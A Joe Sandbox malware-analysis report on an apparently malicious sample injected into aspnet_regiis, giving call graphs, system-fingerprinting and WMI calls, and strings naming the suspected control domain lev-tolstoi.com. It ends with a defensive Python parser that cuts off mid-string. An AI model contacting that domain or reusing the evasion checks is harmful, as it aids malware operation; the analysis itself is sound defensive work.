API calls 15007->15008 15009 72c3cdff 15008->15009 15070 72c38530 15010->15070 15012 72c38b9d 15013 72c38530 ExitProcess 15012->15013 15014 72c38bec 15012->15014 15013->15012 15014->14959 15016 72c54360 15015->15016 15016->15016 15017 72c54376 RtlExpandEnvironmentStrings 15016->15017 15020 72c543d0 15017->15020 15019 72c546e1 15082 72c70460 15019->15082 15020->15019 15022 72c54431 RtlExpandEnvironmentStrings 15020->15022 15025 72c54450 15020->15025 15074 72c706f0 15020->15074 15022->15019 15022->15020 15022->15025 15025->14963 15025->15025 15027 72c5456e 15026->15027 15028 72c70340 LdrInitializeThunk 15027->15028 15030 72c54408 15028->15030 15029 72c706f0 2 API calls 15029->15030 15030->15029 15031 72c546e1 15030->15031 15034 72c54431 RtlExpandEnvironmentStrings 15030->15034 15036 72c54450 15030->15036 15032 72c70460 2 API calls 15031->15032 15033 72c54712 15032->15033 15035 72c70340 LdrInitializeThunk 15033->15035 15033->15036 15034->15030 15034->15031 15034->15036 15035->15036 15036->14967 15038 72c57460 15037->15038 15041 72c574ae 15038->15041 15099 72c6e110 LdrInitializeThunk 15038->15099 15039 72c3cce6 15045 72c57740 15039->15045 15041->15039 15044 72c5756e 15041->15044 15100 72c6e110 LdrInitializeThunk 15041->15100 15042 72c6c570 RtlFreeHeap 15042->15039 15044->15042 15101 72c57760 15045->15101 15047 72c57754 15047->14973 15050 72c58080 15050->14973 15054 72c71650 LdrInitializeThunk 15050->15054 15051 72c581c2 15051->14973 15057 72c58853 15054->15057 15056 72c5804c 15056->15050 15056->15051 15118 72c71320 15056->15118 15122 72c71650 15056->15122 15126 72c71720 15056->15126 15058 72c71720 LdrInitializeThunk 15057->15058 15059 72c588a1 15057->15059 15061 72c588b5 15057->15061 15058->15059 15059->15061 15132 72c6e110 LdrInitializeThunk 15059->15132 15061->14973 15063 72c59f10 15062->15063 15063->15063 15064 72c59f37 RtlExpandEnvironmentStrings 15063->15064 15065 72c59dd1 15064->15065 15065->14975 15067 72c59110 15066->15067 15067->15067 15068 72c59136 
RtlExpandEnvironmentStrings 15067->15068 15069 72c59180 15068->15069 15069->15069 15071 72c38595 15070->15071 15072 72c38542 15070->15072 15071->15072 15073 72c3859c ExitProcess 15071->15073 15072->15012 15073->15072 15075 72c70710 15074->15075 15078 72c7075e 15075->15078 15094 72c6e110 LdrInitializeThunk 15075->15094 15076 72c709d3 15076->15020 15078->15076 15081 72c7084e 15078->15081 15095 72c6e110 LdrInitializeThunk 15078->15095 15079 72c6c570 RtlFreeHeap 15079->15076 15081->15079 15081->15081 15083 72c70480 15082->15083 15086 72c704ce 15083->15086 15096 72c6e110 LdrInitializeThunk 15083->15096 15084 72c54712 15084->15025 15090 72c70340 15084->15090 15086->15084 15089 72c705af 15086->15089 15097 72c6e110 LdrInitializeThunk 15086->15097 15087 72c6c570 RtlFreeHeap 15087->15084 15089->15087 15091 72c70360 15090->15091 15091->15091 15092 72c7042f 15091->15092 15098 72c6e110 LdrInitializeThunk 15091->15098 15092->15025 15094->15078 15095->15081 15096->15086 15097->15089 15098->15092 15099->15041 15100->15044 15102 72c577a0 15101->15102 15102->15102 15133 72c6c5a0 15102->15133 15106 72c5782f 15153 72c6c990 15106->15153 15108 72c57823 15108->15106 15145 72c6cdf0 15108->15145 15111 72c6a2a0 15115 72c6a2d0 15111->15115 15112 72c70340 LdrInitializeThunk 15112->15115 15113 72c706f0 2 API calls 15113->15115 15114 72c6a428 15114->15056 15115->15112 15115->15113 15115->15114 15163 72c70d20 15115->15163 15171 72c6e110 LdrInitializeThunk 15115->15171 15120 72c71340 15118->15120 15119 72c7145e 15119->15056 15120->15119 15174 72c6e110 LdrInitializeThunk 15120->15174 15124 72c71680 15122->15124 15123 72c716ce 15123->15056 15124->15123 15175 72c6e110 LdrInitializeThunk 15124->15175 15127 72c71750 15126->15127 15130 72c717a9 15127->15130 15176 72c6e110 LdrInitializeThunk 15127->15176 15128 72c7184e 15128->15056 15130->15128 15177 72c6e110 LdrInitializeThunk 15130->15177 15132->15061 15134 72c6c5d0 15133->15134 15136 72c6c62e 15134->15136 15157 72c6e110 LdrInitializeThunk 
15134->15157 15136->15136 15138 72c6c749 15136->15138 15139 72c57817 15136->15139 15158 72c6e110 LdrInitializeThunk 15136->15158 15137 72c6c570 RtlFreeHeap 15137->15139 15138->15137 15138->15138 15141 72c6c830 15139->15141 15142 72c6c8fe 15141->15142 15143 72c6c841 15141->15143 15142->15108 15143->15142 15159 72c6e110 LdrInitializeThunk 15143->15159 15146 72c6ce40 15145->15146 15152 72c6ce9e 15146->15152 15160 72c6e110 LdrInitializeThunk 15146->15160 15147 72c6d60e 15147->15108 15149 72c6d59a 15149->15147 15161 72c6e110 LdrInitializeThunk 15149->15161 15151 72c6e110 LdrInitializeThunk 15151->15152 15152->15147 15152->15149 15152->15151 15154 72c6c99a 15153->15154 15156 72c57749 15153->15156 15154->15156 15162 72c6e110 LdrInitializeThunk 15154->15162 15156->15047 15156->15111 15157->15136 15158->15138 15159->15142 15160->15152 15161->15147 15162->15156 15164 72c70d2f 15163->15164 15167 72c70e98 15164->15167 15172 72c6e110 LdrInitializeThunk 15164->15172 15165 72c7114b 15165->15115 15167->15165 15170 72c7108e 15167->15170 15173 72c6e110 LdrInitializeThunk 15167->15173 15168 72c6c570 RtlFreeHeap 15168->15165 15170->15168 15171->15115 15172->15167 15173->15170 15174->15119 15175->15123 15176->15130 15177->15128 15468 72c539b9 15469 72c53406 15468->15469 15473 72c5374a 15468->15473 15470 72c53b50 RtlExpandEnvironmentStrings 15472 72c53c50 15470->15472 15472->15469 15474 72c53c9e RtlExpandEnvironmentStrings 15472->15474 15475 72c53f58 15472->15475 15479 72c53ce2 15472->15479 15481 72c53def 15472->15481 15473->15468 15473->15469 15473->15470 15473->15472 15473->15479 15496 72c6e110 LdrInitializeThunk 15473->15496 15474->15469 15474->15475 15474->15479 15474->15481 15475->15469 15475->15475 15483 72c51d00 15475->15483 15478 72c714b0 LdrInitializeThunk 15478->15481 15479->15478 15479->15479 15480 72c53f41 GetLogicalDrives 15482 72c714b0 LdrInitializeThunk 15480->15482 15481->15469 15481->15475 15481->15480 15481->15481 15482->15475 15484 72c71320 LdrInitializeThunk 
15483->15484 15488 72c51d43 15484->15488 15485 72c523f5 15485->15469 15487 72c6c570 RtlFreeHeap 15489 72c5239e 15487->15489 15488->15485 15495 72c51de9 15488->15495 15497 72c6e110 LdrInitializeThunk 15488->15497 15489->15485 15499 72c6e110 LdrInitializeThunk 15489->15499 15490 72c52383 15490->15487 15492 72c5245a 15490->15492 15494 72c6c570 RtlFreeHeap 15494->15495 15495->15490 15495->15494 15498 72c6e110 LdrInitializeThunk 15495->15498 15496->15473 15497->15488 15498->15495 15499->15489
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID: %"$+A#C=]=_$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$lev-tolstoi.com$s$wdnf$~SS}$rp
• API String ID: 0-796191818
• Opcode ID: 688215a99f4b0a2e654ead558b02c19c0b5e7613f83424743a1e0884aafa2051
• Instruction ID: 27b35d32d93a68c811ad7c6bf2a3c617b76fa1057ba77d09a51b9bf02c04dbea
• Opcode Fuzzy Hash: 688215a99f4b0a2e654ead558b02c19c0b5e7613f83424743a1e0884aafa2051
• Instruction Fuzzy Hash: 10B202B2A04341CFD714CF2AC89176BBBB2FB95314F298A6CE4959B391D734D806CB91

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 204 72c69280-72c692a4 205 72c692b0-72c692d7 204->205 205->205 206 72c692d9-72c692ef 205->206 207 72c692f0-72c69322 206->207 207->207 208 72c69324-72c6936a 207->208 209 72c69370-72c6938c 208->209 209->209 210 72c6938e-72c693a7 209->210 212 72c693ad-72c693b6 210->212 213 72c6942a-72c69435 210->213 214 72c693c0-72c693d9 212->214 215 72c69440-72c6947b 213->215 214->214 216 72c693db-72c693ee 214->216 215->215 217 72c6947d-72c694de CoCreateInstance 215->217 218 72c693f0-72c6941e 216->218 219 72c69906-72c69932 call 72c6fe00 GetVolumeInformationW 217->219 220 72c694e4-72c69515 217->220 218->218 222 72c69420-72c69425 218->222 226 72c69934-72c69938 219->226 227 72c6993c-72c6993e 219->227 223 72c69520-72c6954d 220->223 222->213 223->223 224 72c6954f-72c69576 SysAllocString 223->224 230 72c698f5-72c69902 SysFreeString 224->230 231 72c6957c-72c69596 CoSetProxyBlanket 224->231 226->227 229 72c69950-72c69957 227->229 232 72c69970-72c6998f 229->232 233 72c69959-72c69960 229->233 230->219 234 72c6959c-72c695b4 231->234 235 72c698eb-72c698f1 231->235 237 72c69990-72c699b2 232->237 233->232 236 72c69962-72c6996e 233->236 238 72c695c0-72c6961e 234->238 235->230 236->232 237->237 239 72c699b4-72c699ca 237->239 238->238 241 72c69620-72c6969f SysAllocString 238->241 240 72c699d0-72c69a06 239->240 240->240 242 72c69a08-72c69a2e call 72c4e960 240->242 243 72c696a0-72c696ff 241->243 247 72c69a30-72c69a37 242->247 243->243 245 72c69701-72c6972d SysAllocString 243->245 250 72c698d6-72c698e7 SysFreeString * 2 245->250 251 72c69733-72c69755 245->251 247->247 249 72c69a39-72c69a4c 247->249 252 72c69a52-72c69a65 call 72c37fd0 249->252 253 72c69940-72c6994a 249->253 250->235 258 72c698cc-72c698d2 251->258 259 
72c6975b-72c6975e 251->259 252->253 253->229 255 72c69a6a-72c69a71 253->255 258->250 259->258 260 72c69764-72c69769 259->260 260->258 261 72c6976f-72c697b7 VariantInit 260->261 262 72c697c0-72c697d4 261->262 262->262 263 72c697d6-72c697e0 262->263 264 72c697e4-72c697e6 263->264 265 72c697ec-72c697f2 264->265 266 72c698bb-72c698c8 VariantClear 264->266 265->266 267 72c697f8-72c69806 265->267 266->258 268 72c6983d 267->268 269 72c69808-72c6980d 267->269 270 72c6983f-72c69877 call 72c37f50 call 72c38e10 268->270 271 72c6981c-72c69820 269->271 282 72c698a7-72c698b7 call 72c37f60 270->282 283 72c69879-72c6988f 270->283 273 72c69822-72c6982b 271->273 274 72c69810 271->274 277 72c69832-72c69836 273->277 278 72c6982d-72c69830 273->278 276 72c69811-72c6981a 274->276 276->270 276->271 277->276 280 72c69838-72c6983b 277->280 278->276 280->276 282->266 283->282 284 72c69891-72c6989e 283->284 284->282 286 72c698a0-72c698a3 284->286 286->282
APIs
• CoCreateInstance.OLE32(72C7368C,00000000,00000001,72C7367C,00000000), ref: 72C694CF
• SysAllocString.OLEAUT32(00001F7A), ref: 72C69550
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 72C6958E
• SysAllocString.OLEAUT32(8DFD93FD), ref: 72C69625
• SysAllocString.OLEAUT32(4A105420), ref: 72C69706
• VariantInit.OLEAUT32(?), ref: 72C69774
• VariantClear.OLEAUT32(?), ref: 72C698BC
• SysFreeString.OLEAUT32 ref: 72C698DF
• SysFreeString.OLEAUT32(?), ref: 72C698E5
• SysFreeString.OLEAUT32(00000000), ref: 72C698F6
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 72C6992E
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
• String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
• API String ID: 2573436264-1335595022
• Opcode ID: f5ce5c694c8ba861100af443246ae88eafdb033e422f2f5732706555f3869833
• Instruction ID: 3c435cad67f5b4446a5f0f0d0909e0aca5ee3e84c9280e78065e6164dd5e4990
• Opcode Fuzzy Hash: f5ce5c694c8ba861100af443246ae88eafdb033e422f2f5732706555f3869833
• Instruction Fuzzy Hash: 74222376A083419BD300CF29C880B6BBBE2EFD5314F148A6CF9959B391D775D946CB82
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
• API String ID: 0-510280711
• Opcode ID: e390dcf5c497e26306c88e7be88e81c99a1580868d719d933393d7f892ada6f5
• Instruction ID: 73ab45b1a1ef3ee0cd622b12da568f12c3f45a0ed01cb5b62f5416736fe4a8b7
• Opcode Fuzzy Hash: e390dcf5c497e26306c88e7be88e81c99a1580868d719d933393d7f892ada6f5
• Instruction Fuzzy Hash: 06C204B26082408FD725CF28C8917ABBBE2FFE5314F254A2CD5DA87395DB359805CB42

Control-flow Graph

(control-flow graph rendered as an image; the raw block/edge list is not reproduced here)
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID: )$+$>$@$F$L$[$`
• API String ID: 0-4163809010
• Opcode ID: a1a867c6a02453380212e8cbe4681866eb857501bd7be1d102ae7ce6f306a721
• Instruction ID: d676815b95bc35da4b8a40234bc9029f247e8fcf5659a5ab9d5dd2d6e611977c
• Opcode Fuzzy Hash: a1a867c6a02453380212e8cbe4681866eb857501bd7be1d102ae7ce6f306a721
• Instruction Fuzzy Hash: 81527E7260C7808BD3259B3DC49439FBFE1ABAA324F195A2ED4D9C7381DA748945CB43

Control-flow Graph

(control-flow graph rendered as an image; the raw block/edge list is not reproduced here)
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID: +A#C=]=_$=]=_$_^]\$eN$rp
• API String ID: 0-2225558837
• Opcode ID: fc355ca2facdb06157fa6777e6885cbe4b28eef7dfee084b9aa9e7df5b028f47
• Instruction ID: af59bf2c3d44ca65e641ce57449572066d9164f8196740b8f977b860ceeb27f5
• Opcode Fuzzy Hash: fc355ca2facdb06157fa6777e6885cbe4b28eef7dfee084b9aa9e7df5b028f47
• Instruction Fuzzy Hash: 2E4249B2A04201CFD714CF6AC8917AABBB2FF99310F2986ACD4459F395D734D946CB90

Control-flow Graph

control_flow_graph 1219 72c38600-72c38611 call 72c6d9a0 1222 72c38617-72c3861e call 72c662a0 1219->1222 1223 72c38a48-72c38a4a ExitProcess 1219->1223 1226 72c38a31-72c38a38 1222->1226 1227 72c38624-72c3864a GetCurrentProcessId GetCurrentThreadId 1222->1227 1230 72c38a43 call 72c6e080 1226->1230 1231 72c38a3a-72c38a40 call 72c37f60 1226->1231 1228 72c38650-72c3887f SHGetSpecialFolderPathW 1227->1228 1229 72c3864c-72c3864e 1227->1229 1232 72c38880-72c388ce 1228->1232 1229->1228 1230->1223 1231->1230 1232->1232 1235 72c388d0-72c3891d call 72c6c540 1232->1235 1239 72c38920-72c38943 1235->1239 1240 72c38945-72c38962 1239->1240 1241 72c38964-72c3897c GetForegroundWindow 1239->1241 1240->1239 1242 72c38982-72c38a0b 1241->1242 1243 72c38a0d-72c38a25 call 72c39d00 1241->1243 1242->1243 1243->1226 1246 72c38a27 call 72c3cb90 1243->1246 1248 72c38a2c call 72c3b7b0 1246->1248 1248->1226
APIs
• GetCurrentProcessId.KERNEL32 ref: 72C38624
• GetCurrentThreadId.KERNEL32 ref: 72C3862E
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 72C387FA
• GetForegroundWindow.USER32 ref: 72C38974
  • Part of subcall function 72C3B7B0: FreeLibrary.KERNEL32(72C38A31), ref: 72C3B7B6
  • Part of subcall function 72C3B7B0: FreeLibrary.KERNEL32 ref: 72C3B7D7
• ExitProcess.KERNEL32 ref: 72C38A4A
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID: b]u)$}$}
• API String ID: 3676751680-2900034282
• Opcode ID: 9a0cf0c86e2803da41fad72ecfd2f232b470566eeed4aa13e2b64e70f2a34c86
• Instruction ID: 9950729585a0452a1964da42f151d43aa1119b42ce448ee689646f50f34822cd
• Opcode Fuzzy Hash: 9a0cf0c86e2803da41fad72ecfd2f232b470566eeed4aa13e2b64e70f2a34c86
• Instruction Fuzzy Hash: 25C1F873A187144BC708DF6DC84135AF7D6ABD4710F1ACA2DA899E7355EA74DC048BC2

Control-flow Graph

control_flow_graph 1250 72c3ce45-72c3ce78 call 72c63fd0 call 72c39780 CoUninitialize 1255 72c3ce80-72c3cee4 1250->1255 1255->1255 1256 72c3cee6-72c3cef7 1255->1256 1257 72c3cf00-72c3cf20 1256->1257 1257->1257 1258 72c3cf22-72c3cf64 1257->1258 1259 72c3cf70-72c3cf92 1258->1259 1259->1259 1260 72c3cf94-72c3cf9c 1259->1260 1261 72c3cfbb-72c3cfc3 1260->1261 1262 72c3cf9e-72c3cfa2 1260->1262 1264 72c3cfc5-72c3cfc6 1261->1264 1265 72c3cfdb-72c3cfe6 1261->1265 1263 72c3cfb0-72c3cfb9 1262->1263 1263->1261 1263->1263 1266 72c3cfd0-72c3cfd9 1264->1266 1267 72c3d08a 1265->1267 1268 72c3cfec-72c3cfed 1265->1268 1266->1265 1266->1266 1270 72c3d08d-72c3d095 1267->1270 1269 72c3cff0-72c3cff9 1268->1269 1269->1269 1271 72c3cffb 1269->1271 1272 72c3d097-72c3d09b 1270->1272 1273 72c3d0ad 1270->1273 1271->1270 1275 72c3d0a0-72c3d0a9 1272->1275 1274 72c3d0b0-72c3d0bb 1273->1274 1276 72c3d0cb-72c3d0d7 1274->1276 1277 72c3d0bd-72c3d0bf 1274->1277 1275->1275 1278 72c3d0ab 1275->1278 1280 72c3d0f1-72c3d1b1 1276->1280 1281 72c3d0d9-72c3d0db 1276->1281 1279 72c3d0c0-72c3d0c9 1277->1279 1278->1274 1279->1276 1279->1279 1283 72c3d1c0-72c3d1d2 1280->1283 1282 72c3d0e0-72c3d0ed 1281->1282 1282->1282 1284 72c3d0ef 1282->1284 1283->1283 1285 72c3d1d4-72c3d1f4 1283->1285 1284->1280 1286 72c3d200-72c3d252 1285->1286 1286->1286 1287 72c3d254-72c3d26b call 72c3b7e0 1286->1287 1289 72c3d270-72c3d28a 1287->1289
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: Uninitialize
• String ID: 6=.)$<1!9$`{tu$lev-tolstoi.com
• API String ID: 3861434553-1386727196
• Opcode ID: 8d626705dcfdc6932566f1cd300ba6fa2d07796faf8b8e4b24d87cd7f69ea0c1
• Instruction ID: c261f4e6c77983af1cc9d53e52cc38c97c5e884753c9c8a8937805abf8bbffd7
• Opcode Fuzzy Hash: 8d626705dcfdc6932566f1cd300ba6fa2d07796faf8b8e4b24d87cd7f69ea0c1
• Instruction Fuzzy Hash: 09A103B52047818FD716CF2AC4D0756BBE2FFA6304B18899CC8D24F75AD736A446CB91

Control-flow Graph

control_flow_graph 1323 72c5d34a-72c5d362 1324 72c5d370-72c5d382 1323->1324 1324->1324 1325 72c5d384-72c5d389 1324->1325 1326 72c5d39b-72c5d3a7 1325->1326 1327 72c5d38b-72c5d38f 1325->1327 1328 72c5d3c1-72c5d40f call 72c6fe00 GetPhysicallyInstalledSystemMemory 1326->1328 1329 72c5d3a9-72c5d3ab 1326->1329 1330 72c5d390-72c5d399 1327->1330 1335 72c5d410-72c5d44d 1328->1335 1331 72c5d3b0-72c5d3bd 1329->1331 1330->1326 1330->1330 1331->1331 1333 72c5d3bf 1331->1333 1333->1328 1335->1335 1336 72c5d44f-72c5d498 call 72c4e960 1335->1336 1339 72c5d4a0-72c5d551 1336->1339 1339->1339 1340 72c5d557-72c5d55c 1339->1340 1341 72c5d57d-72c5d583 1340->1341 1342 72c5d55e-72c5d568 1340->1342 1343 72c5d586-72c5d58e 1341->1343 1344 72c5d570-72c5d579 1342->1344 1345 72c5d590-72c5d591 1343->1345 1346 72c5d5ab-72c5d5b3 1343->1346 1344->1344 1347 72c5d57b 1344->1347 1348 72c5d5a0-72c5d5a9 1345->1348 1349 72c5d5b5-72c5d5b6 1346->1349 1350 72c5d5cb-72c5d611 1346->1350 1347->1343 1348->1346 1348->1348 1351 72c5d5c0-72c5d5c9 1349->1351 1352 72c5d620-72c5d653 1350->1352 1351->1350 1351->1351 1352->1352 1353 72c5d655-72c5d65a 1352->1353 1354 72c5d66d 1353->1354 1355 72c5d65c-72c5d65d 1353->1355 1357 72c5d670-72c5d67a 1354->1357 1356 72c5d660-72c5d669 1355->1356 1356->1356 1358 72c5d66b 1356->1358 1359 72c5d67c-72c5d67f 1357->1359 1360 72c5d68b-72c5d73c 1357->1360 1358->1357 1361 72c5d680-72c5d689 1359->1361 1361->1360 1361->1361
APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 72C5D3EE
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID: ><+
• API String ID: 3960555810-2918635699
• Opcode ID: f36516b8c752d9f96217e6134381c60ab0554eec521bd469f67543d3d1265131
• Instruction ID: 8bf420ed8ae52bd493437fb6e55a2fa0dbfb9438a7c713b001d08e9133d69f35
• Opcode Fuzzy Hash: f36516b8c752d9f96217e6134381c60ab0554eec521bd469f67543d3d1265131
• Instruction Fuzzy Hash: 88C1C0756047818FD715CF2AC490762FBF2AF9A314B28899DC4EB8B752C735E846CB50
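The function blocks above all share one text layout (a control_flow_graph edge list, then APIs, Strings, Memory Dump Source and Similarity). The Python below is an added example, not Joe Sandbox code: it parses that layout into one record per function, harvests API names from the CFG edges as well as from the APIs list (the CoUninitialize block above names its API only on the graph), pulls domain-shaped tokens out of the String ID field (which is where lev-tolstoi.com surfaces), and flags host-fingerprinting calls such as GetPhysicallyInstalledSystemMemory against a small watchlist. The watchlist and the trimmed SAMPLE excerpt are the example's own assumptions, not report content.

```python
"""Parse the per-function blocks of a Joe Sandbox report (the
'control_flow_graph / APIs / Similarity' sections above) into records and
flag host-fingerprinting APIs and domains hidden in the String ID field.
Added example, not Joe Sandbox code; EVASION_APIS is an analyst watchlist
(assumption) and SAMPLE is an excerpt of this report with CFG lines cut short."""
import re
from dataclasses import dataclass, field

# Assumption: a small watchlist; the report's own signatures remain the
# authority on what this sample actually does.
EVASION_APIS = {
    "GetPhysicallyInstalledSystemMemory": "RAM-size check (small RAM suggests a sandbox)",
    "GetSystemFirmwareTable": "SMBIOS/ACPI read (hypervisor vendor strings)",
    "IsDebuggerPresent": "debugger check",
}
CFG_RE = re.compile(r"^control_flow_graph\s+\d+\s+([0-9a-f]{8})")
CFG_API_RE = re.compile(r"\b[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*\b")  # API names among edges
API_RE = re.compile(r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?(\w+)\.(\w+)")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
DOMAIN_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}\b", re.I)
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class FunctionBlock:
    entry: str                                  # first basic block listed in the CFG
    apis: list = field(default_factory=list)    # (api, module, reached_via_subcall)
    cfg_apis: set = field(default_factory=set)  # names on CFG edges (APIs list can be empty)
    string_ids: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def domains(self):
        """Domain-shaped tokens in String ID ('$' separates the strings)."""
        return sorted({m.group(0).lower() for s in self.string_ids for m in DOMAIN_RE.finditer(s)})

    def evasion_hits(self):
        names = {a for a, _, _ in self.apis} | self.cfg_apis
        return sorted((a, EVASION_APIS[a]) for a in names if a in EVASION_APIS)


def parse_blocks(text):
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()                       # the HTML export pads every line
        if not line:
            continue
        m = CFG_RE.match(line)
        if m:                                    # a CFG line opens a new function block
            cur = FunctionBlock(entry=m.group(1))
            cur.cfg_apis.update(CFG_API_RE.findall(line))
            blocks.append(cur)
            section = None
        elif cur is None:
            continue
        elif line in SECTIONS:
            section = line
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append((m.group(2), m.group(3), m.group(1) is not None))
        elif m := FIELD_RE.match(line):
            key = m.group(1).strip()
            val = m.group(2).removesuffix("Download File").strip()  # link text from the HTML
            if key == "String ID":
                cur.string_ids = [s for s in val.split("$") if s]
            else:
                cur.fields[key] = val
    return blocks


def summarize(blocks):
    """One line per function: APIs seen, domains, watchlist hits, fuzzy-hash prefix."""
    return [f"{b.entry}: apis={sorted({a for a, _, _ in b.apis} | b.cfg_apis)} "
            f"domains={b.domains()} evasion={[a for a, _ in b.evasion_hits()]} "
            f"ifh={b.fields.get('Instruction Fuzzy Hash', '')[:16]}" for b in blocks]


# Excerpt of two blocks from the report above, CFG edge lists cut short.
SAMPLE = """\
control_flow_graph 1250 72c3ce45-72c3ce78 call 72c63fd0 call 72c39780 CoUninitialize 1255 72c3ce80-72c3cee4 1250->1255
APIs
Memory Dump Source
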